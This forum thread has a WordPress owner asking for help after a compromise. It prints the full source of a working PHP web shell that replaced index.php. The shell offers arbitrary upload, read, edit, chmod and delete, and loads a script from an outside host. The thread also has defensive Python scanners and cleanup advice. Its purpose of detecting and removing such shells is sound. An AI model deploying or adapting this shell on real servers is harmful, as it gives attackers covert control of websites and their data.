PHP
Andrew, 2020-09-04 13:28:23

I found this on my WordPress (CMS) site. Do you think this is the main one, or should I dig further?

The attack began about a week ago, and it is hitting all the sites hard: new users and new plugins keep appearing, among them the one that created a problem for almost a million sites, wp file manager. After I cleaned up and deleted the extra files, one change remains: the substitution of index.php, apparently done through curl, which I found in the logs:

<?php
set_time_limit(0);
error_reporting(0);

// Undo magic_quotes escaping on POST data (legacy PHP; get_magic_quotes_gpc() is deprecated in 7.4 and gone in 8)
if(get_magic_quotes_gpc()){
    foreach($_POST as $key=>$value){
        $_POST[$key] = stripslashes($value);
    }
}

echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>CHips L Pro sangad</title>
<style>
body{
    font-family: "console", cursive;
    background-color: #ffffff;
    text-shadow:0px 0px 1px #ffffff;
}
#content tr:hover{
    background-color: #000000;
    text-shadow:0px 0px 10px #ffffff;
}
#content .first{
    background-color: black;
}
#content .first:hover{
    background-color: black;
    text-shadow:0px 0px 1px #000000;
}
table{
    border: 5px #000000 dotted;
}
H1{
    font-family: "Rye", cursive;
}
a{
    color: #000000;
    text-decoration: none;
}
a:hover{
    color: #fff;
    text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
    border: 2px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:5px;
}
</style>
</HEAD>
<BODY>
<SCRIPT SRC=http://rootkitninja.com/say.js>></SCRIPT>
<H1><center>CHips L MINI SHELL</center></H1>
<H1><center>CHips L pro</center></H1>
<body class="  pace-done" bgcolor="Black"><div class="pace  pace-inactive"><div class="pace-progress" data-progress-text="100%" data-progress="99" style="width: 100%;">
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Current Path : ';

// Working directory is taken straight from ?path= (no validation); defaults to the script's cwd
if(isset($_GET['path'])){
    $path = $_GET['path'];
}else{
    $path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

// Breadcrumb links, one per path component
foreach($paths as $id=>$pat){
    if($pat == '' && $id == 0){
        $a = true;
        echo '<a href="?path=/">/</a>';
        continue;
    }
    if($pat == '') continue;
    echo '<a href="?path=';
    for($i=0;$i<=$id;$i++){
        echo "$paths[$i]";
        if($i != $id) echo "/";
    }
    echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';

// Multipart upload of any file into the current path
if(isset($_FILES['file'])){
    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
        echo '<font color="green">Upload File Berhasil Cok !</font><br />';
    }else{
        echo '<font color="red">Upload File Gagal Cok ! Mamposh Lo !</font><br />';
    }
}
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload cok !" />
</form>
</td></tr>';

if(isset($_GET['filesrc'])){
    // View any readable file named in ?filesrc=
    echo "<tr><td>Current File : ";
    echo $_GET['filesrc'];
    echo '</tr></td></table><br />';
    echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
    // chmod / rename / edit, all driven by POST fields
    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
    if($_POST['opt'] == 'chmod'){
        if(isset($_POST['perm'])){
            if(chmod($_POST['path'],$_POST['perm'])){
                echo '<font color="green">Mengubah Permission Berhasil</font><br />';
            }else{
                echo '<font color="red">Mengubah Pemission Gagal</font><br />';
            }
        }
        echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
    }elseif($_POST['opt'] == 'rename'){
        if(isset($_POST['newname'])){
            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
                echo '<font color="green">Ganti Nama Berhasil</font><br />';
            }else{
                echo '<font color="red">Ganti Nama Gagal</font><br />';
            }
            $_POST['name'] = $_POST['newname'];
        }
        echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
    }elseif($_POST['opt'] == 'edit'){
        if(isset($_POST['src'])){
            $fp = fopen($_POST['path'],'w');
            if(fwrite($fp,$_POST['src'])){
                echo '<font color="green">Edit File Berhasil</font><br />';
            }else{
                echo '<font color="red">Edit File Gagal</font><br />';
            }
            fclose($fp);
        }
        echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
    }
    echo '</center>';
}else{
    echo '</table><br /><center>';
    // Delete a directory or file named in POST
    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
        if($_POST['type'] == 'dir'){
            if(rmdir($_POST['path'])){
                echo '<font color="green">Menghapus Directory Berhasil</font><br />';
            }else{
                echo '<font color="red">Menghapus Directory Gagal</font><br />';
            }
        }elseif($_POST['type'] == 'file'){
            if(unlink($_POST['path'])){
                echo '<font color="green">Delete File Done.</font><br />';
            }else{
                echo '<font color="red">Delete File Error.</font><br />';
            }
        }
    }
    echo '</center>';

    // Directory listing: subdirectories first, then files, each with an options form
    $scandir = scandir($path);
    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';

    foreach($scandir as $dir){
        if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
        echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
        if(is_writable("$path/$dir")) echo '<font color="Blue">';
        elseif(!is_readable("$path/$dir")) echo '<font color="red">';
        echo perms("$path/$dir");
        if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

        echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\"Oke\" />
</form></center></td>
</tr>";
    }
    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
    foreach($scandir as $file){
        if(!is_file("$path/$file")) continue;
        $size = filesize("$path/$file")/1024;
        $size = round($size,3);
        if($size >= 1024){
            $size = round($size/1024,2).' MB';
        }else{
            $size = $size.' KB';
        }

        echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>";
        if(is_writable("$path/$file")) echo '<font color="Blue">';
        elseif(!is_readable("$path/$file")) echo '<font color="red">';
        echo perms("$path/$file");
        if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
        echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\"Oke\" />
</form></center></td>
</tr>";
    }
    echo '</table>
</div>';
}

echo '<center><br />Copyright 2K16 - 2K18 Indonesian Hacker Rulez</font><center>

<div align="center"><img style="width:100; height:100px ;" src="http://rootkitninja.com/images/devil.jpg?r=<?=rand(0,16000);?>"></div>

</BODY>
</HTML>';

// Render a file's mode bits in ls -l style (drwxr-xr-x)
function perms($file){
    $perms = fileperms($file);

    if (($perms & 0xC000) == 0xC000) {
        // Socket
        $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) {
        // Symbolic Link
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        // Regular
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        // Block special
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        // Directory
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        // Character special
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        // FIFO pipe
        $info = 'p';
    } else {
        // Unknown
        $info = 'u';
    }

    // Owner
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ?
        (($perms & 0x0800) ? 's' : 'x' ) :
        (($perms & 0x0800) ? 'S' : '-'));

    // Group
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ?
        (($perms & 0x0400) ? 's' : 'x' ) :
        (($perms & 0x0400) ? 'S' : '-'));

    // World
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ?
        (($perms & 0x0200) ? 't' : 'x' ) :
        (($perms & 0x0200) ? 'T' : '-'));

    return $info;
}
?>
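A defender-side check for the kind of index.php replacement described in the question, added here as an example and not code from the original post: it scans a site tree for the file-operation patterns and hard-coded strings visible in the pasted shell, and flags an index.php that no longer just loads wp-blog-header.php. The indicator names, the stock-index heuristic and the two sample sources are my own assumptions.

```python
import os
import re

# Indicators taken from the shell pasted in the question: arbitrary upload, POST-driven
# write/chmod/rename/delete, GET-driven read, and the kit's own hard-coded strings.
INDICATORS = {
    "upload_to_arbitrary_path": r"copy\(\s*\$_FILES\[",
    "post_driven_file_ops": r"\b(chmod|unlink|rename|rmdir)\(\s*\$_POST\[",
    "post_driven_file_write": r"fwrite\(\s*\$\w+\s*,\s*\$_POST\[",
    "get_driven_file_read": r"file_get_contents\(\s*\$_(GET|POST)\[",
    "magic_quotes_probe": r"get_magic_quotes_gpc\(",
    "known_kit_string": r"CHips L|Indonesian Hacker Rulez",
    "external_script_host": r"rootkitninja\.com",
}

def scan_php_source(src: str) -> list:
    """Return the names of all indicators present in one PHP source text."""
    return [name for name, rx in INDICATORS.items() if re.search(rx, src)]

def index_php_looks_stock(src: str) -> bool:
    """Heuristic (an assumption, not a WordPress rule): a genuine index.php only loads
    wp-blog-header.php and carries none of the indicators above."""
    loads_header = re.search(r"require(?:_once)?\s*\(?.*wp-blog-header\.php", src)
    return loads_header is not None and not scan_php_source(src)

def scan_tree(root: str) -> dict:
    """Walk a site tree and map each suspicious .php file to the indicators it hit."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, fn)
            try:
                with open(full, encoding="utf-8", errors="ignore") as fh:
                    src = fh.read()
            except OSError:
                continue
            found = scan_php_source(src)
            if fn == "index.php" and not index_php_looks_stock(src):
                found.append("index_php_not_stock")
            if found:
                hits[full] = found
    return hits

# Constructed samples (not real site files): a stock-style index.php and a fragment shaped like the shell above.
STOCK_INDEX = "<?php\ndefine( 'WP_USE_THEMES', true );\nrequire __DIR__ . '/wp-blog-header.php';\n"
SUSPECT_SAMPLE = ("<?php\nif(get_magic_quotes_gpc()){}\n"
                  "if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){}\n"
                  "if(unlink($_POST['path'])){}\n")
```

Run `scan_tree("/path/to/site")` against a copy of the site taken before cleanup so the hits can be compared with what was removed; a real scanner such as the one the hoster or AI-Bolit provides will cover far more patterns than these seven.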


3 answer(s)
Anton R., 2020-09-04
@anton_reut

wp file manager
- the golden rule of any CMS: NEVER install any modules or plugins that let you manipulate any files other than images in the images folder! And some patients manage to install plugins that let you put PHP code right into the articles...
Do you think this is the main one, or should I dig further?
- Of course, look for everything. Most likely a lot of things have already settled in there. Write to the hoster to have all folders and backups scanned; Aibolit and SSH will help you...

Andrew, 2020-09-07
@Majestty

I constantly see this request; tell me whether it is a system request or an attack. It comes at the same time every day:
[07/Sep/2020:07:00:01 +0300] "GET / HTTP/1.1" 200 45 "-" "curl/7.29.0"
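Added example, not from the original thread: a way to tell whether a request like the one above recurs on a schedule. It parses combined-format access-log lines, groups them by method, path and user agent, and reports groups that hit at the same minute on several different days. The sample lines are constructed, the client IP is optional because the line in the question was pasted without one, and the "scheduled job" reading is a heuristic that the source address and the server's crontab have to confirm.

```python
import re
from collections import defaultdict

# Combined-log fields we need; the client IP prefix is not required.
LOG_RX = re.compile(
    r'\[(?P<date>\d{2}/\w{3}/\d{4}):(?P<time>\d{2}:\d{2}:\d{2}) [+-]\d{4}\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

def parse_line(line: str):
    """Return the fields of one access-log line as a dict, or None if it does not parse."""
    m = LOG_RX.search(line)
    return m.groupdict() if m else None

def find_periodic_requests(lines, min_days: int = 3) -> dict:
    """Group requests by (method, path, user-agent) and report the groups seen on at
    least min_days distinct days, always at the same minute of the day. That pattern is
    consistent with a scheduled job (cron, uptime monitoring) rather than scanning,
    which tends to vary in path and timing; it is a lead, not a verdict."""
    seen = defaultdict(lambda: {"days": set(), "minutes": set()})
    for line in lines:
        f = parse_line(line)
        if f is None:
            continue
        key = (f["method"], f["path"], f["ua"])
        seen[key]["days"].add(f["date"])
        seen[key]["minutes"].add(f["time"][:5])  # HH:MM, ignore seconds
    periodic = {}
    for key, v in seen.items():
        if len(v["days"]) >= min_days and len(v["minutes"]) == 1:
            periodic[key] = {"days": len(v["days"]), "at": next(iter(v["minutes"]))}
    return periodic

# Constructed sample (not real log data): the daily curl hit from the question on three
# days, plus ordinary browser traffic at varying times.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Sep/2020:07:00:01 +0300] "GET / HTTP/1.1" 200 45 "-" "curl/7.29.0"',
    '203.0.113.5 - - [06/Sep/2020:07:00:01 +0300] "GET / HTTP/1.1" 200 45 "-" "curl/7.29.0"',
    '203.0.113.5 - - [07/Sep/2020:07:00:01 +0300] "GET / HTTP/1.1" 200 45 "-" "curl/7.29.0"',
    '198.51.100.7 - - [06/Sep/2020:12:41:10 +0300] "GET /about/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Sep/2020:18:02:33 +0300] "GET /about/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
]
```

Feed it the real access log with `find_periodic_requests(open("access.log"))` and then check whether the reported source address is the server itself or the hoster's monitoring range.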
